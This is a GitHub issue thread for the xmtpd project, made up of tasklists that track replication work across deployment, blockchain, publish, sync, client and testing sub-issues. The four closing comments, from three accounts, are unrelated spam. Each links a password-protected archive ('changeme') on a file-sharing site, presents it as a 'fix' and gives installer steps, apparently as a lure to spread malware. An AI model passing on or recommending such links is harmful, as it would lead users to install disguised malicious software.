### ISSUE TITLE
Replication tracking task

### ISSUE THREAD

**Issue by richardhuaaa** [xmtp/xmtpd#118]
```[tasklist]
### Deployment and metrics
- [ ] https://github.com/ephemeraHQ/infrastructure/issues/389
- [ ] https://github.com/ephemeraHQ/infrastructure/issues/388
- [ ] https://github.com/xmtp/xmtpd/issues/137
- [ ] https://github.com/xmtp/xmtpd/issues/138
- [ ] https://github.com/xmtp/xmtpd/issues/141
- [ ] https://github.com/xmtp/xmtpd/issues/140
- [ ] https://github.com/xmtp/xmtpd/issues/139
- [ ] https://github.com/xmtp/xmtpd/issues/191
- [ ] https://github.com/xmtp/xmtpd/issues/201
- [ ] https://github.com/xmtp/xmtpd/issues/202
- [ ] https://github.com/xmtp/xmtpd/issues/203
- [ ] https://github.com/xmtp/xmtpd/issues/149
- [ ] https://github.com/xmtp/xmtpd/issues/151
- [ ] https://github.com/xmtp/xmtpd/issues/152
- [ ] https://github.com/xmtp/xmtpd/issues/225
- [x] https://github.com/xmtp/xmtpd/issues/375
- [ ] https://github.com/xmtp/xmtpd/issues/366
- [ ] https://github.com/xmtp/xmtpd/issues/265
- [ ] https://github.com/xmtp/xmtpd/issues/287
- [ ] https://github.com/xmtp/xmtpd/issues/288
- [ ] https://github.com/xmtp/xmtpd/issues/280
- [ ] https://github.com/xmtp/xmtpd/issues/369
- [ ] https://github.com/xmtp/xmtpd/issues/370
- [ ] https://github.com/xmtp/xmtpd/issues/371
- [ ] https://github.com/xmtp/xmtpd/issues/373
- [ ] https://github.com/xmtp/xmtpd/issues/372
- [ ] https://github.com/ephemeraHQ/infrastructure/issues/423
- [ ] https://github.com/xmtp/xmtpd/issues/357
- [ ] https://github.com/xmtp/xmtpd/issues/374
```

```[tasklist]
### Blockchain
- [x] Utilities to publish GroupMessages to blockchain
- [ ] https://github.com/xmtp/xmtpd/issues/135
- [ ] https://github.com/xmtp/xmtpd/issues/136
- [ ] https://github.com/xmtp/xmtpd/issues/144
- [ ] https://github.com/xmtp/xmtpd/issues/155
- [x] https://github.com/xmtp/xmtpd/issues/376
- [ ] https://github.com/xmtp/xmtpd/issues/168
- [x] Utilities to publish IdentityUpdates to blockchain
- [ ] https://github.com/xmtp/xmtpd/issues/204
- [ ] https://github.com/xmtp/xmtpd/issues/212
- [ ] https://github.com/xmtp/xmtpd/issues/315
- [ ] https://github.com/xmtp/xmtpd/issues/377
- [ ] https://github.com/xmtp/xmtpd/issues/378
- [ ] https://github.com/xmtp/xmtpd/issues/379
- [ ] https://github.com/xmtp/xmtpd/issues/200
- [ ] https://github.com/xmtp/xmtpd/issues/381
- [ ] https://github.com/xmtp/xmtpd/issues/335
- [ ] https://github.com/xmtp/xmtpd/issues/322
- [ ] https://github.com/xmtp/xmtpd/issues/323
- [ ] https://github.com/xmtp/xmtpd/issues/324
- [ ] https://github.com/xmtp/xmtpd/issues/325
- [ ] https://github.com/xmtp/xmtpd/issues/336
- [ ] https://github.com/xmtp/xmtpd/issues/350
- [ ] https://github.com/xmtp/xmtpd/issues/351
- [ ] https://github.com/xmtp/xmtpd/issues/354
- [ ] https://github.com/xmtp/xmtpd/issues/380
```

```[tasklist]
### Publish
- [ ] https://github.com/xmtp/xmtpd/issues/127
- [ ] https://github.com/xmtp/xmtpd/issues/262
- [ ] https://github.com/xmtp/xmtpd/issues/231
- [ ] https://github.com/xmtp/xmtpd/issues/360
- [x] Add logic to determine if a given write should go to blockchain or broadcast network
- [ ] https://github.com/xmtp/xmtpd/issues/359
- [x] Identity update validation and computed data
- [ ] https://github.com/xmtp/xmtpd/issues/232
- [ ] https://github.com/xmtp/xmtpd/issues/383
- [ ] https://github.com/xmtp/xmtpd/issues/205
- [ ] https://github.com/xmtp/xmtpd/issues/382
- [ ] https://github.com/xmtp/xmtpd/issues/358
```

```[tasklist]
### Query and Subscribe
- [ ] https://github.com/xmtp/xmtpd/issues/124
- [ ] https://github.com/xmtp/xmtpd/issues/218
- [ ] https://github.com/xmtp/xmtpd/issues/132
- [ ] https://github.com/xmtp/xmtpd/issues/125
- [ ] https://github.com/xmtp/xmtpd/issues/167
- [ ] https://github.com/xmtp/xmtpd/issues/126
- [ ] https://github.com/xmtp/xmtpd/issues/221
- [ ] https://github.com/xmtp/xmtpd/issues/255
- [ ] https://github.com/xmtp/xmtpd/issues/361
- [ ] https://github.com/xmtp/xmtpd/issues/387
- [ ] https://github.com/xmtp/xmtpd/issues/254
- [ ] https://github.com/xmtp/xmtpd/issues/362
```

```[tasklist]
### Sync
- [ ] https://github.com/xmtp/xmtpd/issues/181
- [x] Use consistent URL format for connecting to servers - http:// or https:// vs dns:// and passthrough://
- [ ] https://github.com/xmtp/xmtpd/issues/220
- [ ] https://github.com/xmtp/xmtpd/issues/385
- [ ] https://github.com/xmtp/xmtpd/issues/269
- [ ] https://github.com/xmtp/xmtpd/issues/267
- [ ] https://github.com/xmtp/xmtpd/issues/264
- [ ] https://github.com/xmtp/xmtpd/issues/302
- [ ] https://github.com/xmtp/xmtpd/issues/266
- [ ] https://github.com/xmtp/xmtpd/issues/368
- [ ] https://github.com/xmtp/xmtpd/issues/367
- [ ] https://github.com/xmtp/xmtpd/issues/289
- [ ] https://github.com/xmtp/xmtpd/issues/240
```

```[tasklist]
### Client
- [ ] https://github.com/xmtp/xmtpd/issues/150
- [ ] https://github.com/xmtp/xmtpd/issues/169
- [x] https://github.com/xmtp/libxmtp/issues/1551
- [x] https://github.com/xmtp/libxmtp/issues/1649
- [x] https://github.com/xmtp/xmtpd/issues/390
- [ ] https://github.com/xmtp/libxmtp/issues/1535
- [ ] https://github.com/xmtp/libxmtp/issues/1539
- [ ] Implement retries for dependency errors on send
- [ ] https://github.com/xmtp/libxmtp/issues/1536
- [ ] (Optional) Multi-node publishes/queries for trust purposes
- [x] (Optional) Stream identity updates
- [ ] https://github.com/xmtp/libxmtp/issues/1297
- [ ] https://github.com/xmtp/libxmtp/issues/1298
- [ ] https://github.com/xmtp/libxmtp/issues/1299
- [ ] https://github.com/xmtp/libxmtp/issues/1301
- [ ] https://github.com/xmtp/libxmtp/issues/1302
- [ ] https://github.com/xmtp/xmtpd/issues/426
```

```[tasklist]
### Documentation and Training
- [ ] https://github.com/xmtp/xmtpd/issues/296
- [ ] https://github.com/xmtp/xmtpd/issues/386
- [ ] https://github.com/xmtp/xmtpd/issues/389
- [ ] https://github.com/xmtp/xmtpd/issues/187
- [ ] https://github.com/xmtp/xmtpd/issues/331
```
```[tasklist]
### Testnet Partners
- [ ] https://github.com/xmtp/xmtpd/issues/263
- [ ] https://github.com/xmtp/xmtpd/issues/268
- [ ] https://github.com/xmtp/xmtpd/issues/300
- [ ] Spike: Partner node onboarding automation
- [ ] https://github.com/xmtp/xmtpd-infrastructure/issues/6
- [x] https://github.com/xmtp/xmtpd/issues/428
```

```[tasklist]
### Testing and Stability
- [x] Unit test for syncing across multiple nodes
- [ ] Unit test for failure scenarios while syncing across multiple nodes
- [ ] https://github.com/xmtp/xmtpd/issues/298
- [ ] https://github.com/xmtp/xmtpd/issues/299
- [ ] E2E test for publish/subscribe across multiple originators
- [ ] E2E test for sync failures and node connectivity issues
- [ ] Integration/E2E tests for modifying nodes contract and seeing results in the NodeRegistry
- [ ] Automated tests for TLS on localhost
- [ ] https://github.com/xmtp/xmtpd-infrastructure/issues/1
- [ ] Write some tool to deserialize MLS messages
- [ ] https://github.com/xmtp/xmtpd/issues/329
```

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
